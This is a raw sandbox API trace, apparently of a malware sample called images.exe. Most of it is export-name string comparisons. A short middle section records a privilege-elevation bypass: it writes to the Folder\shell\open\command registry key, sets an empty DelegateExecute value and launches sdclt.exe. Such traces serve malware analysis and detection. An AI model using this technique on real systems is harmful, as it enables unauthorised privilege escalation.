lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.411] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepAppXExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepReportFault", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="Beep", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BuildCommDCBA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="BuildCommDCBW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CallNamedPipeA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CallNamedPipeW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CancelIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.412] lstrcmpA (lpString1="CancelIoEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckElevation", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckTokenCapability", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="ClearCommBreak", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="ClearCommError", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="ClosePackageInfo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseState", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpool", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CmdBatNotification", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CommConfigDialogA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CommConfigDialogW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CompareCalendarDates", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CompareFileTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.413] lstrcmpA (lpString1="CompareStringA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CompareStringEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CompareStringW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyContext", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFile2", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyFileW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CopyLZFile", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateActCtxA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateActCtxW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.414] lstrcmpA (lpString1="CreateDirectoryW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.419] lstrcmpA (lpString1="CreateEnclave", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.419] lstrcmpA (lpString1="CreateEventA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.419] lstrcmpA (lpString1="CreateEventExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateEventExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateEventW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFiber", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFiberEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFile2", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileMappingA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileMappingW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateFileW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateHardLinkA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateHardLinkW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateJobObjectA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateJobObjectW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateJobSet", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.420] lstrcmpA (lpString1="CreateMailslotA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMailslotW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMutexA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMutexExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMutexExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateMutexW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreatePipe", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateProcessW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateRemoteThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateRemoteThreadEx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateSemaphoreA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateSemaphoreExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateSemaphoreExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateSemaphoreW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.421] lstrcmpA (lpString1="CreateSocketHandle", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateSymbolicLinkA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateSymbolicLinkTransactedA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateSymbolicLinkTransactedW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateSymbolicLinkW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateTapePartition", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThread", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpool", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpoolCleanupGroup", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpoolIo", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpoolTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpoolWait", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateThreadpoolWork", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateTimerQueue", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateTimerQueueTimer", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateToolhelp32Snapshot", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateWaitableTimerA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateWaitableTimerExA", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateWaitableTimerExW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CreateWaitableTimerW", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="CtrlRoutine", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="DeactivateActCtx", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="DeactivateActCtxWorker", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.422] lstrcmpA (lpString1="DebugActiveProcess", lpString2="Wow64DisableWow64FsRedirection") returned -1 [0268.423] Wow64DisableWow64FsRedirection (in: OldValue=0xa0f8c0 | out: OldValue=0xa0f8c0*=0x0) returned 1 [0268.423] InitializeSecurityDescriptor (in: pSecurityDescriptor=0xa0f244, dwRevision=0x1 | out: pSecurityDescriptor=0xa0f244) returned 1 [0268.423] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0xa0f244, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0xa0f244) returned 1 [0268.423] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Classes\\Folder\\shell\\open\\command", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0xa0f258, phkResult=0xa0f268, lpdwDisposition=0xa0f264 | out: phkResult=0xa0f268*=0x2c4, lpdwDisposition=0xa0f264*=0x1) returned 0x0 [0268.455] RegCloseKey (hKey=0x2c4) returned 0x0 [0268.455] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xa0f27c, nSize=0x400 | out: lpFilename="C:\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe")) returned 0x19 [0268.456] lstrlenA (lpString="C:\\ProgramData\\images.exe") returned 25 [0268.456] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Classes\\Folder\\shell\\open\\command", ulOptions=0x0, samDesired=0x20006, phkResult=0xa0f260 | out: phkResult=0xa0f260*=0x2c4) returned 0x0 [0268.456] RegSetValueExA (in: hKey=0x2c4, lpValueName="", Reserved=0x0, dwType=0x1, lpData="C:\\ProgramData\\images.exe", cbData=0x19 | out: lpData="C:\\ProgramData\\images.exe") returned 0x0 [0268.456] RegCloseKey (hKey=0x2c4) returned 0x0 [0268.456] lstrlenA (lpString="") returned 0 [0268.456] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Classes\\Folder\\shell\\open\\command", ulOptions=0x0, samDesired=0x20006, phkResult=0xa0f258 | out: phkResult=0xa0f258*=0x2c4) returned 0x0 [0268.456] RegSetValueExA (in: hKey=0x2c4, lpValueName="DelegateExecute", Reserved=0x0, dwType=0x1, lpData="", cbData=0x0 | out: lpData="") returned 0x0 [0268.457] RegCloseKey (hKey=0x2c4) returned 0x0 [0268.457] GetSystemDirectoryW (in: lpBuffer=0xa0f67c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0268.457] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\sdclt.exe" | out: lpString1="C:\\Windows\\system32\\sdclt.exe") returned="C:\\Windows\\system32\\sdclt.exe" [0268.457] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Windows\\system32\\sdclt.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0273.138] ShellExecuteExW (in: pExecInfo=0xa0f884*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\system32\\sdclt.exe", lpParameters=0x0, lpDirectory=0x0, nShow=5, hInstApp=0x0, lpIDList=0x5551e2f6, lpClass="H 㘮Ț峢ș峢ș", hkeyClass=0x219fc4e, dwHotKey=0x2c4, hIcon=0x75850a20, hMonitor=0x75850a20, hProcess=0x0) | out: pExecInfo=0xa0f884*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="open", lpFile="C:\\Windows\\system32\\sdclt.exe", lpParameters=0x0, lpDirectory=0x0, nShow=5, hInstApp=0x2a, lpIDList=0x5551e2f6, lpClass="H 㘮Ț峢ș峢ș", hkeyClass=0x219fc4e, dwHotKey=0x2c4, hIcon=0x75850a20, hMonitor=0x75850a20, hProcess=0x408)) returned 1 [0281.929] TerminateProcess (hProcess=0x408, uExitCode=0x0) returned 1 [0281.977] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="ActivateActCtx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddAtomA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddAtomW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddDllDirectory", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.977] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddRefActCtx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AllocConsole", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AreFileApisANSI", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="AttachConsole", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="BackupRead", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="BackupSeek", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="BackupWrite", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.978] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseCheckElevation", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA 